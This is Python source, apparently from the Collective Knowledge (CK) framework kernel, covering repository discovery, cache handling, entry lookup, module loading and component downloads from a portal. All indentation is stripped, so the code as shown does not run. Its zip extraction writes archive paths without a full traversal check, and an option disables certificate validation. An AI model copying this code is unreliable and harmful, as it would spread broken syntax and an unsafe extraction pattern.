pxx=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
px=os.path.dirname(pxx)
py=os.path.join(pxx, cfg['subdir_default_repo'])
searched_places.append(py)
if os.path.isdir(py):
p=py
if p=='':
from distutils.sysconfig import get_python_lib
px=get_python_lib()
py=os.path.join(px, cfg['kernel_dir'], cfg['subdir_default_repo'])
searched_places.append(py)
if os.path.isdir(py):
p=py
if p=='':
import site
for px in site.getsitepackages():
py=os.path.join(px, cfg['kernel_dir'],cfg['subdir_default_repo'])
searched_places.append(py)
if os.path.isdir(py):
p=py
break
# Check CK_ROOT environment variable
s=os.environ.get(cfg['env_key_root'],'').strip()
if s!='':
work['env_root']=os.path.realpath(s)
for px in cfg['kernel_dirs']:
searched_places.append(py)
py=os.path.join(work['env_root'], px, cfg['subdir_default_repo'])
if os.path.isdir(py):
p=py
break
elif px!='':
work['env_root']=px
# Get home user directory
from os.path import expanduser
home=expanduser("~")
# Check default repo
x=os.environ.get(cfg['env_key_default_repo'],'').strip()
if x!='' and os.path.isdir(x):
work['dir_default_repo']=x
else:
if p=='':
# Attempt to find in userspace (since V1.11.2.1)
x=os.path.join(home, '.ck', __version__, cfg['subdir_default_repo'])
if os.path.isfile(os.path.join(x, cfg['repo_file'])):
p=x
if p=='':
return {'return':1, 'error':'Unusual CK installation detected since we can\'t find the CK package path with the default repo (searched in '+str(searched_places)+'). It often happens when you install CK under root while other tools (which use CK) under user and vice versa. Please reinstall other tools that use CK in the same way as CK (root or user). If the problem persists, please report to the author (<EMAIL>).'}
work['dir_default_repo']=p
work['dir_default_repo_path']=os.path.join(work['dir_default_repo'], cfg['module_repo_name'], cfg['repo_name_default'])
work['dir_default_kernel']=os.path.join(work['dir_default_repo'], cfg['subdir_kernel'])
work['dir_default_cfg']=os.path.join(work['dir_default_kernel'], cfg['subdir_kernel_default'], cfg['subdir_ck_ext'], cfg['file_meta'])
work['dir_work_repo']=work['dir_default_repo']
work['dir_work_repo_path']=work['dir_default_repo_path']
work['dir_work_kernel']=work['dir_default_kernel']
work['dir_work_cfg']=work['dir_default_cfg']
if os.path.isfile(work['dir_default_cfg']):
r=load_json_file({'json_file':work['dir_default_cfg']})
if r['return']>0: return r
cfg1=r['dict']
# Update cfg
r=merge_dicts({'dict1':cfg, 'dict2':cfg1})
if r['return']>0: return r
work['repo_name_work']=cfg['repo_name_default']
work['repo_uid_work']=cfg['repo_uid_default']
# Check external repos
rps=os.environ.get(cfg['env_key_repos'],'').strip()
if rps=='':
# In the original version, if path to repos was not defined, I was using CK path,
# however, when installed as root, it will fail
# rps=os.path.join(work['env_root'],cfg['subdir_default_repos'])
# hence I changed to <user home dir>/CK
rps=os.path.join(home, cfg['user_home_dir_ext'])
if not os.path.isdir(rps):
os.makedirs(rps)
work['dir_repos']=rps
# Check CK_LOCAL_REPO environment variable - if doesn't exist, create in user space
s=os.environ.get(cfg['env_key_local_repo'],'').strip()
if s=='':
# Set up local default repository
s=os.path.join(rps, cfg['repo_name_local'])
if not os.path.isdir(s):
os.makedirs(s)
# Create description
rq=save_json_to_file({'json_file':os.path.join(s,cfg['repo_file']),
'dict':{'data_alias':cfg['repo_name_local'],
'data_uoa':cfg['repo_name_local'],
'data_name':cfg['repo_name_local'],
'data_uid':cfg['repo_uid_local']},
'sort_keys':'yes'})
if rq['return']>0: return rq
if s!='':
work['local_kernel_uoa']=cfg['subdir_kernel_default']
x=os.environ.get(cfg['env_key_local_kernel_uoa'],'').strip()
if x!='': work['local_kernel_uoa']=x
work['dir_local_repo']=os.path.realpath(s)
work['dir_local_repo_path']=os.path.join(work['dir_local_repo'], cfg['module_repo_name'], cfg['repo_name_local'])
work['dir_local_kernel']=os.path.join(work['dir_local_repo'], cfg['subdir_kernel'])
work['dir_local_cfg']=os.path.join(work['dir_local_kernel'], work['local_kernel_uoa'], cfg['subdir_ck_ext'], cfg['file_meta'])
# Update work repo!
work['dir_work_repo']=work['dir_local_repo']
work['dir_work_repo_path']=work['dir_local_repo_path']
work['dir_work_kernel']=work['dir_local_kernel']
work['dir_work_cfg']=work['dir_local_cfg']
work['repo_name_work']=cfg['repo_name_local']
work['repo_uid_work']=cfg['repo_uid_local']
paths_repos.append({'path':work['dir_local_repo'],
'repo_uoa':cfg['repo_name_local'],
'repo_uid':cfg['repo_uid_local'],
'repo_alias':cfg['repo_name_local']})
paths_repos.append({'path':work['dir_default_repo'],
'repo_uoa':cfg['repo_name_default'],
'repo_uid':cfg['repo_uid_default'],
'repo_alias':cfg['repo_name_default']})
# Prepare repo cache
work['dir_cache_repo_uoa']=os.path.join(work['dir_work_repo'],cfg['file_cache_repo_uoa'])
work['dir_cache_repo_info']=os.path.join(work['dir_work_repo'],cfg['file_cache_repo_info'])
# Check if first time and then copy local cache files (with remote-ck)
if not os.path.isfile(work['dir_cache_repo_uoa']) and not os.path.isfile(work['dir_cache_repo_info']):
rx=load_text_file({'text_file':os.path.join(work['dir_default_repo'],cfg['file_cache_repo_uoa'])})
if rx['return']>0: return rx
x1=rx['string']
rx=load_text_file({'text_file':os.path.join(work['dir_default_repo'],cfg['file_cache_repo_info'])})
if rx['return']>0: return rx
x2=rx['string']
rx=save_text_file({'text_file':work['dir_cache_repo_info'], 'string':x2})
if rx['return']>0: return rx
rx=save_text_file({'text_file':work['dir_cache_repo_uoa'], 'string':x1})
if rx['return']>0: return rx
# Check if local configuration exists, and if not, create it
if not os.path.isfile(work['dir_local_cfg']):
# Create empty local configuration
rx=add({'repo_uoa':cfg['repo_name_local'],
'module_uoa':cfg['subdir_kernel'],
'data_uoa':work['local_kernel_uoa']})
if rx['return']>0:
return {'return':rx['return'],
'error':'can\'t create local configuration entry'}
# Read kernel configuration (if exists)
if os.path.isfile(work['dir_work_cfg']):
r=load_json_file({'json_file':work['dir_work_cfg']})
if r['return']>0: return r
cfg1=r['dict']
# Update cfg
r=merge_dicts({'dict1':cfg, 'dict2':cfg1})
if r['return']>0: return r
# Check if need to log CK entries
if cfg.get('log_ck_entries','')!='':
log_ck_entries=True
initialized=True
return {'return':0}
##############################################################################
# List all files recursively in a given directory
#
# TARGET: CK kernel and low-level developers
def list_all_files(i):
"""
Input: {
path - top level path
(file_name) - search for a specific file name
(pattern) - return only files with this pattern
(path_ext) - path extension (needed for recursion)
(limit) - limit number of files (if directories with a large number of files)
(number) - current number of files
(all) - if 'yes' do not ignore special directories (like .cm)
(ignore_names) - list of names to ignore
(ignore_symb_dirs) - if 'yes', ignore symbolically linked dirs
(to avoid recursion such as in LLVM)
(add_path) - if 'yes', add path
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
list - dictionary of all files:
{"file_with_full_path":{"size":.., "path":..}
sizes - sizes of files (the same order)
number - number of files in a current directory (needed for recursion)
}
"""
number=0
if i.get('number','')!='':
number=int(i['number'])
inames=i.get('ignore_names',[])
fname=i.get('file_name','')
limit=-1
if i.get('limit','')!='':
limit=int(i['limit'])
a={}
iall=i.get('all','')
pe=''
if i.get('path_ext','')!='':
pe=i['path_ext']
po=i.get('path','')
if sys.version_info[0]<3: po=unicode(po)
pattern=i.get('pattern','')
if pattern!='':
import fnmatch
xisd=i.get('ignore_symb_dirs','')
isd=False
if xisd=='yes': isd=True
ap=i.get('add_path','')
try:
dirList=os.listdir(po)
except Exception as e:
None
else:
for fn in dirList:
p=os.path.join(po, fn)
if iall=='yes' or fn not in cfg['special_directories']:
if len(inames)==0 or fn not in inames:
if os.path.isdir(p):
if not isd or os.path.realpath(p)==p:
r=list_all_files({'path':p, 'all':iall, 'path_ext':os.path.join(pe, fn),
'number':str(number), 'ignore_names':inames, 'pattern':pattern,
'file_name':fname, 'ignore_symb_dirs':xisd, 'add_path':ap, 'limit': limit})
if r['return']>0: return r
a.update(r['list'])
else:
add=True
if fname!='' and fname!=fn:
add=False
if pattern!='' and not fnmatch.fnmatch(fn, pattern):
add=False
if add:
pg=os.path.join(pe, fn)
if os.path.isfile(p):
a[pg]={'size':os.stat(p).st_size}
if ap=='yes': a[pg]['path']=po
number=len(a)
if limit!=-1 and number>=limit:
break
return {'return':0, 'list':a, 'number':str(number)}
##############################################################################
# Download entry from remote host (experimental)
#
# TARGET: end users
def download(i):
"""
Input: {
(repo_uoa)
(module_uoa)
(data_uoa)
(new_repo_uoa) - new repo UOA; "local" by default
(skip_module_check) - if 'yes', do not check if module for a given component exists
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
smc=(i.get('skip_module_check','')=='yes')
# Check components to skip
if muoa in ['repo', 'befd7892b0d469e9',
'env', '9b9b3208ac44b891',
'kernel', 'b1e99f6461424276',
'cfg', 'b34231a3467566f8']:
return {'return':0}
if muoa=='':
return {'return':1, 'error':'module UOA is not defined'}
if duoa=='': duoa='*'
# return {'return':1, 'error':'data UOA is not defined'}
nruoa=i.get('new_repo_uoa','')
if nruoa=='': nruoa='local'
# Check if writing to new repo is allowed
r=find_path_to_repo({'repo_uoa':nruoa})
if r['return']>0: return r
nruoa=r['repo_uoa']
nruid=r['repo_uid']
nrd=r['dict']
npath=r['path']
ii={'repo_uoa':nruoa, 'repo_uid':nruid, 'repo_dict':nrd}
r=check_writing(ii)
if r['return']>0: return r
rz={'return':0}
if o=='con':
# out('')
out(' WARNING: downloading missing CK component "'+muoa+':'+duoa+'" from the cKnowledge.io portal ...')
ii={
'action':'download',
'dict':{
'module_uoa':muoa,
'data_uoa':duoa
}
}
import ck.net
r=ck.net.access_ck_api({'url':cfg['cknowledge_api'], 'dict':ii})
if r['return']>0: return r
d=r['dict']
if d['return']>0:
if d['return']!=16:
return {'return':d['return'], 'error':d['error']}
out(' Warning: component not found')
return {'return':0}
nlst=d.get('components',[])
# Check if module:module there (bootstrapping)
lst1=[]
lst=[]
path_to_module=''
for q in nlst:
nmuoa=q['module_uoa']
nmuid=q['module_uid']
nduoa=q['data_uoa']
nduid=q['data_uid']
if nmuoa=='module' and nduoa=='module':
out(' Bootstrapping '+nmuoa+':'+nduoa+' ...')
# TBD: Check split dirs in local repo...
iii={'path':npath, 'data_uoa':'module', 'data_uid':nduid}
rz=find_path_to_entry(iii)
if rz['return']>0 and rz['return']!=16: return rz
elif rz['return']==16:
rz=create_entry(iii)
if rz['return']>0: return rz
npath2=rz['path']
iii={'path':npath2, 'data_uoa':'module', 'data_uid':nduid}
rz=find_path_to_entry(iii)
if rz['return']>0 and rz['return']!=16: return rz
elif rz['return']==16:
rz=create_entry(iii)
if rz['return']>0: return rz
path_to_module=rz['path']
lst.append(q)
else:
lst1.append(q)
lst+=lst1
# Recording downloaded components
for q in lst:
# Get UOA
nmuoa=q['module_uoa']
nmuid=q['module_uid']
nduoa=q['data_uoa']
nduid=q['data_uid']
file_url=q['file_url']
file_md5=q['file_md5']
out(' Downloading and extracting '+nmuoa+':'+nduoa+' ...')
# Check that module:module exists
if nmuoa=='module' and nduoa=='module' and path_to_module!='':
new_path=path_to_module
else:
if not smc:
save_state=cfg['download_missing_components']
cfg['download_missing_components']='no'
rz=access({'action':'find',
'module_uoa':'module',
'data_uoa':'module',
'common_func':'yes'})
if rz['return']>0 and rz['return']!=16: return rz
if rz['return']==16:
rz=download({'repo_uoa':nruoa,
'module_uoa':'module',
'data_uoa':'module',
'skip_module_check':'yes'})
if rz['return']>0: return rz
cfg['download_missing_components']=save_state
# Adding dummy module
rz=access({'action':'add',
'module_uoa':nmuoa,
'module_uid':nmuoa,
'data_uoa':nduoa,
'data_uid':nduid,
'repo_uoa':'local',
'common_func':'yes'})
if rz['return']>0:
out(' Skipping ...')
continue
new_path=rz['path']
# Prepare pack
ppz=os.path.join(new_path, 'pack.zip')
if os.path.isfile(ppz):
os.remove(ppz)
# Download file
# Import modules compatible with Python 2.x and 3.x
import urllib
try: from urllib.request import urlretrieve
except: from urllib import urlretrieve
# Connect
try:
urlretrieve(file_url, ppz)
except Exception as e:
return {'return':1, 'error':'download failed ('+format(e)+')'}
statinfo = os.stat(ppz)
file_size=statinfo.st_size
# MD5 of the pack
rx=load_text_file({'text_file':ppz, 'keep_as_bin':'yes'})
if rx['return']>0: return rx
bpack=rx['bin']
import hashlib
md5=hashlib.md5(bpack).hexdigest()
if md5!=file_md5:
return {'return':1, 'error':'MD5 of the newly created pack ('+md5+') did not match the one from the portal ('+file_md5+')'}
# Unzipping archive
import zipfile
new_f=open(ppz, 'rb')
new_z=zipfile.ZipFile(new_f)
for new_d in new_z.namelist():
if new_d!='.' and new_d!='..' and not new_d.startswith('\\'):
new_pp=os.path.join(new_path,new_d)
if new_d.endswith('/'):
if not os.path.exists(new_pp): os.makedirs(new_pp)
else:
new_ppd=os.path.dirname(new_pp)
if not os.path.exists(new_ppd): os.makedirs(new_ppd)
# extract file
new_fo=open(new_pp, 'wb')
new_fo.write(new_z.read(new_d))
new_fo.close()
new_f.close()
# Remove pack file
os.remove(ppz)
return {'return':0}
##############################################################################
# Reload repo cache
#
# TARGET: CK kernel and low-level developers
def reload_repo_cache(i):
"""
Input: {
(force) - if 'yes', force recaching
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
global cache_repo_uoa, cache_repo_info, paths_repos_all, cache_repo_init
if i.get('force','')=='yes': # pragma: no cover
cache_repo_init=False
paths_repos_all=[]
if not cache_repo_init:
# Load repo UOA -> UID disambiguator
r=load_json_file({'json_file':work['dir_cache_repo_uoa']})
if r['return']!=16 and r['return']>0: return r
cache_repo_uoa=r.get('dict',{})
# Load cached repo info
r=load_json_file({'json_file':work['dir_cache_repo_info']})
if r['return']!=16 and r['return']>0: return r
cache_repo_info=r.get('dict',{})
# Prepare all paths
for q in cache_repo_info:
qq=cache_repo_info[q]
dd=qq['dict']
p=dd.get('path','')
if p!='':
paths_repos_all.append({'path':os.path.normpath(p),
'dict': dd, # Added in version 1.11.2.1 to support dir split per repo
'repo_uoa':qq['data_uoa'],
'repo_uid':qq['data_uid'],
'repo_alias':qq['data_alias']})
cache_repo_init=True
return {'return':0}
##############################################################################
# Save repo cache
#
# TARGET: CK kernel and low-level developers
def save_repo_cache(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
r=save_json_to_file({'json_file':work['dir_cache_repo_uoa'], 'dict':cache_repo_uoa})
if r['return']>0: return r
r=save_json_to_file({'json_file':work['dir_cache_repo_info'], 'dict':cache_repo_info})
if r['return']>0: return r
return {'return':0}
##############################################################################
# Load repo from cache
#
# TARGET: CK kernel and low-level developers
def load_repo_info_from_cache(i):
"""
Input: {
repo_uoa - repo_uoa
}
Output: {
return - return code = 0, if successful
16, if repo not found (may be warning)
> 0, if error
(error) - error text if return > 0
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
all other info from repo dict
}
"""
ruoa=i['repo_uoa']
ruid=ruoa
if cfg.get('force_lower','')=='yes':
ruoa=ruoa.lower()
ruid=ruid.lower()
if ruoa==cfg['repo_name_default'] or ruoa==cfg['repo_uid_default']:
d={}
d["path_to_repo_desc"]=work['dir_default_repo_path']
d["data_uid"]=cfg['repo_uid_default']
d["data_alias"]=cfg['repo_name_default']
d["data_uoa"]=cfg['repo_name_default']
d["dict"]={"default":"yes"}
elif ruoa==cfg['repo_name_local'] or ruoa==cfg['repo_uid_local']:
d={}
d["path_to_repo_desc"]=work['dir_local_repo_path']
d["data_uid"]=cfg['repo_uid_local']
d["data_alias"]=cfg['repo_name_local']
d["data_uoa"]=cfg['repo_name_local']
d["dict"]={"default":"yes"}
else:
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
if not is_uid(ruoa):
ruid=cache_repo_uoa.get(ruoa,'')
if ruid=='':
return {'return':1, 'error':'repository "'+ruoa+'" was not found in the cache. Check if repository exists or try "ck recache repo"'}
d=cache_repo_info.get(ruid,{})
if len(d)==0:
return {'return':1, 'error':'repository was not found in the cache'}
r={'return':0}
r.update(d)
return r
##############################################################################
# Find repo by path
#
# TARGET: CK kernel and low-level developers
def find_repo_by_path(i):
"""
Input: {
path - path to repo
}
Output: {
return - return code = 0, if successful
16, if repo not found (may be warning)
> 0, if error
(error) - error text if return > 0
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
}
"""
p=i['path']
if p!='': p=os.path.normpath(p)
dd={}
found=False
if p==work['dir_default_repo']:
uoa=cfg['repo_name_default']
uid=cfg['repo_uid_default']
alias=uoa
found=True
elif p==work['dir_local_repo']:
uoa=cfg['repo_name_local']
uid=cfg['repo_uid_local']
alias=uoa
found=True
else:
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
for q in cache_repo_info:
qq=cache_repo_info[q]
dd=qq['dict']
if p==dd.get('path',''):
uoa=qq['data_uoa']
uid=qq['data_uid']
alias=uid
if not is_uid(uoa): alias=uoa
found=True
break
if not found:
return {'return':16, 'error': 'repository not found in this path'}
return {'return':0, 'repo_uoa': uoa, 'repo_uid': uid, 'repo_alias':alias, 'repo_dict':dd}
##############################################################################
# Find path to a given repo
#
# TARGET: end users
def find_path_to_repo(i):
"""
Input: {
(repo_uoa) - repo UOA; if empty, get the default repo
}
Output: {
return - return code = 0, if successful
16, if repo not found (may be warning)
> 0, if error
(error) - error text if return > 0
dict - dict from cache
path - path to repo
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
}
"""
a=i.get('repo_uoa','')
if cfg.get('force_lower','')=='yes':
a=a.lower()
ai=a
pr=''
if a!='':
if a==cfg['repo_name_default'] or a==cfg['repo_uid_default']:
pr=work['dir_default_repo']
uoa=cfg['repo_name_default']
uid=cfg['repo_uid_default']
alias=uoa
dt={}
elif a==cfg['repo_name_local'] or a==cfg['repo_uid_local']:
pr=work['dir_local_repo']
uoa=cfg['repo_name_local']
uid=cfg['repo_uid_local']
alias=uoa
dt={}
else:
# Reload cache if not initialized
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
if not is_uid(a):
ai=cache_repo_uoa.get(a,'')
if ai=='':
return {'return':1, 'error':'repository "'+a+'" was not found in cache'}
cri=cache_repo_info.get(ai, {})
if len(cri)==0:
return {'return':1, 'error':'repository "'+ai+'" was not found in cache'}
dt=cri.get('dict',{})
pr=dt.get('path','')
uoa=cri['data_uoa']
uid=cri['data_uid']
alias=cri['data_alias']
else:
# Get current repo path
pr=work['dir_work_repo']
uoa=work['repo_name_work']
uid=work['repo_uid_work']
alias=uoa
dt={}
return {'return':0, 'path':pr, 'repo_uoa':uoa, 'repo_uid':uid, 'repo_alias':alias, 'dict':dt}
##############################################################################
# Find path to data (first search in default repo, then local one and then all other repos)
#
# TARGET: CK kernel and low-level developers
def find_path_to_data(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
}
Output: {
return - return code = 0, if successful
16, if data not found (may be warning)
> 0, if error
(error) - error text if return > 0
path - path to data
path_module - path to module entry with this entry
path_repo - path to the repository of this entry
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
module_uoa - module UOA
module_uid - module UID
module_alias - module alias
uoa - data UOA
uid - data UID
alias - data alias
}
"""
muoa=i['module_uoa']
muid='?'
duoa=i['data_uoa']
duid='?'
ruoa=i.get('repo_uoa','')
ruid=''
ralias=''
if ruoa!='':
r=find_path_to_repo({'repo_uoa':ruoa})
if r['return']>0: return r
ps=[r]
qmax=1
else:
ps=paths_repos
qmax=2
# Search
found=False
pr=''
pm=''
pd=''
for q in range(0,qmax):
if found: break
if q==1:
# Check / reload all repos
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
ps=paths_repos_all
for prx in ps:
pr=prx['path']
ruoa=prx['repo_uoa']
ruid=prx['repo_uid']
ralias=prx['repo_alias']
r=find_path_to_entry({'path':pr, 'data_uoa':muoa})
if r['return']>0 and r['return']!=16: return r
elif r['return']==0:
muoa=r['data_uoa']
muid=r['data_uid']
malias=r['data_alias']
pm=r['path']
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(prx.get('dict',{}), muid, muoa)
iii={'path':pm, 'data_uoa':duoa}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r1=find_path_to_entry(iii)
if r1['return']>0 and r1['return']!=16: return r1
elif r1['return']==0:
found=True
pd=r1['path']
duoa=r1['data_uoa']
duid=r1['data_uid']
dalias=r1['data_alias']
break
if found: break
if not found:
s=''
# if ruoa!='': s+=ruoa+':'
s+=muoa+':'+duoa+'" ('
if ruoa!='':
# if ruid!='':s+=ruid+':'
# else: s+='?:'
s+='?:'
s+=muid+':'+duid+')'
if muoa=='module' or muoa=='032630d041b4fd8a':
if cfg.get('check_missing_modules','')=='yes':
ii={
'action':'download',
'dict':{
'module_uoa':muoa,
'data_uoa':duoa
}
}
import ck.net
r=ck.net.access_ck_api({'url':cfg['cknowledge_api'], 'dict':ii})
if r['return']>0: return r
d=r['dict']
component_url=''
dc=d.get('components',[])
if len(dc)==1:
component_url=dc[0].get('file_url','')
if component_url!='':
j=component_url.find('/?')
if j>=0:
component_url=component_url[:j]
s+='. However, it was found at '+component_url+' '
return {'return':16, 'error':'can\'t find path to CK entry "'+s}
# # Get info about repo
# if ruid=='':
# r=find_repo_by_path({'path':pr})
# if r['return']>0: return r
# ruoa=r['repo_uoa']
# ruid=r['repo_uid']
# ralias=r['repo_alias']
# qmax=1
# Check logging of repo:module:uoa to be able to rebuild CK dependencies
if log_ck_entries:
lce=cfg.get('log_ck_entries','')
if lce!='':
rl=save_text_file({'text_file':lce,
'string':'"action":"find", "repo_uoa":"'+
ruoa+'", "repo_uid":"'+
ruid+'", "module_uoa":"'+
muoa+'", "module_uid":"'+
muid+'", "data_uoa":"'+
duoa+'", "data_uid":"'+
duid+'"\n',
'append':'yes'})
if rl['return']>0: return rl
return {'return':0, 'path':pd, 'path_module':pm, 'path_repo':pr,
'repo_uoa':ruoa, 'repo_uid':ruid, 'repo_alias':ralias,
'module_uoa':muoa, 'module_uid':muid, 'module_alias':malias,
'data_uoa':duoa, 'data_uid':duid, 'data_alias':dalias}
##############################################################################
# Find path to an UOA entry (check UID or alias)
#
# TARGET: CK kernel and low-level developers
def find_path_to_entry(i):
"""
Input: {
path - (str) path to a repository
data_uoa - (str) data UOA
(split_dirs) - (int/str) number of first characters to split directory into subdirectories
to be able to handle many entries (similar to Mediawiki)
}
Output: {
return - return code = 0, if successful
16, if data not found (may be warning)
> 0, if error
(error) - error text if return > 0
path - path to data entry
data_uid - data uid (from UOA)
data_alias - data alias (from UOA)
data_uoa - data alias or data uid, if data alias==''
}
"""
p=i['path']
duoa=i['data_uoa']
if cfg.get('force_lower','')=='yes':
duoa=duoa.lower()
if duoa=='': # pragma: no cover
raise Exception('data_uoa is empty')
split_dirs=safe_int(i.get('split_dirs',0),0)
# Check split
pp=p
# Disambiguate UOA
alias=''
if is_uid(duoa):
# If UID
uid=duoa
# Check if alias exists
p1=os.path.join(pp, cfg['subdir_ck_ext'], cfg['file_alias_u'] + uid)
found_alias=False
if os.path.isfile(p1):
try:
f=open(p1)
alias=f.readline().strip()
f.close()
found_alias=True
except Exception as e:
None
# If alias exists, check directory with alias
if found_alias:
sd1,sd2=split_name(alias, split_dirs)
if sd2!='': # otherwise name is smaller than the split number
p=os.path.join(p,sd1)
p2=os.path.join(p, alias)
return {'return':0, 'path':p2, 'data_uid':uid, 'data_alias':alias, 'data_uoa':alias}
sd1,sd2=split_name(uid, split_dirs)
if sd2!='': # otherwise name is smaller than the split number
p=os.path.join(p,sd1)
p2=os.path.join(p, uid)
if os.path.isdir(p2):
return {'return':0, 'path':p2, 'data_uid':uid, 'data_alias':'', 'data_uoa':uid}
return {'return':-1}
sd1,sd2=split_name(duoa, split_dirs)
if sd2!='': # otherwise name is smaller than the split number
p=os.path.join(p,sd1)
# If alias
alias=duoa
p1=os.path.join(p, alias)
if sys.version_info[0]<3:
try: p1=p1.encode('utf8')
except Exception as e: pass
if os.path.isdir(p1):
# Check uid for this alias
p2=os.path.join(pp, cfg['subdir_ck_ext'], cfg['file_alias_a'] + alias)
try:
f=open(p2)
uid=f.readline().strip()
f.close()
except Exception as e:
return {'return':10, 'error':'inconsistent entry: alias "'+alias+'" exists, but not the UID in file '+p2,
'path':p1, 'data_alias':alias}
return {'return':0, 'path':p1, 'data_uid':uid, 'data_alias':alias, 'data_uoa':alias}
return {'return':16, 'error':'can\'t find path to CK entry'}
##############################################################################
# Load meta description from a path
#
# TARGET: CK kernel and low-level developers
def load_meta_from_path(i):
"""
Input: {
path - path to a data entry
(skip_updates) - if 'yes', do not load updates
(skip_desc) - if 'yes', do not load descriptions
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - dict with meta description
path - path to json file with meta description
(info) - dict with info if exists
(path_info) - path to json file with info
(updates) - dict with updates if exists
(path_updates) - path to json file with updates
(path_desc) - path to json file with API description
}
"""
p=i['path']
slu=i.get('skip_updates','')
sld=i.get('skip_desc','')
p1=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_meta'])
if not os.path.isfile(p1):
p1=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_meta_old']) # For compatibility with cM
if not os.path.isfile(p1):
p1=''
if p1!='':
rx={'return':0}
r=load_json_file({'json_file':p1})
if r['return']>0: return r
rx['path']=p1
rx['dict']=r['dict']
# Check info file
p2=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_info'])
if os.path.isfile(p2):
r=load_json_file({'json_file':p2})
if r['return']>0: return r
rx['path_info']=p2
rx['info']=r['dict']
# Check updates file
if slu!='yes':
p3=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_updates'])
if os.path.isfile(p3):
r=load_json_file({'json_file':p3})
if r['return']>0: return r
rx['path_updates']=p3
rx['updates']=r['dict']
# Check desc file
if sld!='yes':
p4=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_desc'])
if os.path.isfile(p4):
r=load_json_file({'json_file':p4})
if r['return']>0: return r
rx['path_desc']=p4
rx['desc']=r['dict']
return rx
else:
return {'return':1, 'error':'meta description is not found in path '+p}
##############################################################################
# Load (CK) python module
#
# TARGET: end users
def load_module_from_path(i):
"""
Input: {
path - module path
module_code_name - module name
(cfg) - configuration of the module if exists ...
(skip_init) - if 'yes', skip init
(data_uoa) - module UOA (useful when printing error)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
code - python code object
path - full path to the module
cuid - internal UID of the module
}
"""
p=i['path']
n=i['module_code_name']
xcfg=i.get('cfg',None)
# Find module
try:
x=imp.find_module(n, [p])
except ImportError as e: # pragma: no cover
return {'return':1, 'error':'can\'t find module code (path='+p+', name='+n+', err='+format(e)+')'}
ff=x[0]
full_path=x[1]
# Check if code has been already loaded
if full_path in work['cached_module_by_path'] and work['cached_module_by_path_last_modification'][full_path]==os.path.getmtime(full_path):
ff.close()
# Code already loaded
return work['cached_module_by_path'][full_path]
# Check if has dependency on specific CK kernel version
if xcfg!=None:
kd=xcfg.get('min_kernel_dep','')
if kd!='':
rx=check_version({'version':kd})
if rx['return']>0: return rx
ok=rx['ok']
version_str=rx['current_version']
if ok!='yes':
return {'return':1, 'error':'module "'+i.get('data_uoa','')+'" requires minimal CK kernel version '+kd+' while your version is '+version_str}
# Generate uid for the run-time extension of the loaded module
# otherwise modules with the same extension (key.py for example)
# will be reloaded ...
r=gen_uid({})
if r['return']>0: return r
ruid='rt-'+r['data_uid']
try:
c=imp.load_module(ruid, ff, full_path, x[2])
except ImportError as e: # pragma: no cover
return {'return':1, 'error':'can\'t load module code (path='+p+', name='+n+', err='+format(e)+')'}
x[0].close()
# Initialize module with this CK instance
c.ck=sys.modules[__name__]
if xcfg!=None: c.cfg=xcfg
# Initialize module
if i.get('skip_init','')!='yes':
# Check if init function exists
if getattr(c, 'init')!=None:
r=c.init(i)
if r['return']>0: return r
r={'return':0, 'code':c, 'path':full_path, 'cuid':ruid}
# Cache code together with its time of change
work['cached_module_by_path'][full_path]=r
work['cached_module_by_path_last_modification'][full_path]=os.path.getmtime(full_path)
return r
##############################################################################
# Perform remote action via CK web service
#
# TARGET: CK kernel and low-level developers
def perform_remote_action(i):
"""
Input: { See 'perform_action' function }
Output: { See 'perform_action' function }
"""
# Import modules compatible with Python 2.x and 3.x
import urllib
try: import urllib.request as urllib2
except: import urllib2 # pragma: no cover
try: from urllib.parse import urlencode
except: from urllib import urlencode # pragma: no cover
rr={'return':0}
# Get action
act=i.get('action','')
# Check output
o=i.get('out','')
if o=='con':
# out('Initiating remote access ...')
# out('')
i['out']='con'
i['quiet']='yes'
if act=='pull':
i['out']='json'
else:
i['out']='json'
# # Clean up input
# if o!='json_file':
# rr['out']='json' # Decided to return json to show that it's remote ...
if 'cid' in i:
del(i['cid']) # already processed
# Get URL
url=i.get('remote_server_url','')
# Process i
if 'remote_server_url' in i: del(i['remote_server_url'])
# Pre process if push file ...
if act=='push':
# Check file
fn=i.get('filename','')
if fn=='':
x=i.get('cids',[])
if len(x)>0:
fn=x[0]
if fn=='':
return {'return':1, 'error':'filename is empty'}
if not os.path.isfile(fn):
return {'return':1, 'error':'file '+fn+' not found'}
rx=convert_file_to_upload_string({'filename':fn})
if rx['return']>0: return rx
i['file_content_base64']=rx['file_content_base64']
# Leave only filename without path
i['filename']=os.path.basename(fn)
# Prepare post variables
r=dumps_json({'dict':i, 'skip_indent':'yes'})
if r['return']>0: return r
s=r['string'].encode('utf8')
post=urlencode({'ck_json':s})
if sys.version_info[0]>2: post=post.encode('utf8')
# Check if skip SSL certificate
ctx=None
add_ctx=False
if i.get('remote_skip_certificate_validation','')=='yes':
del(i['remote_skip_certificate_validation'])
import ssl
ctx = ssl.create_default_context()
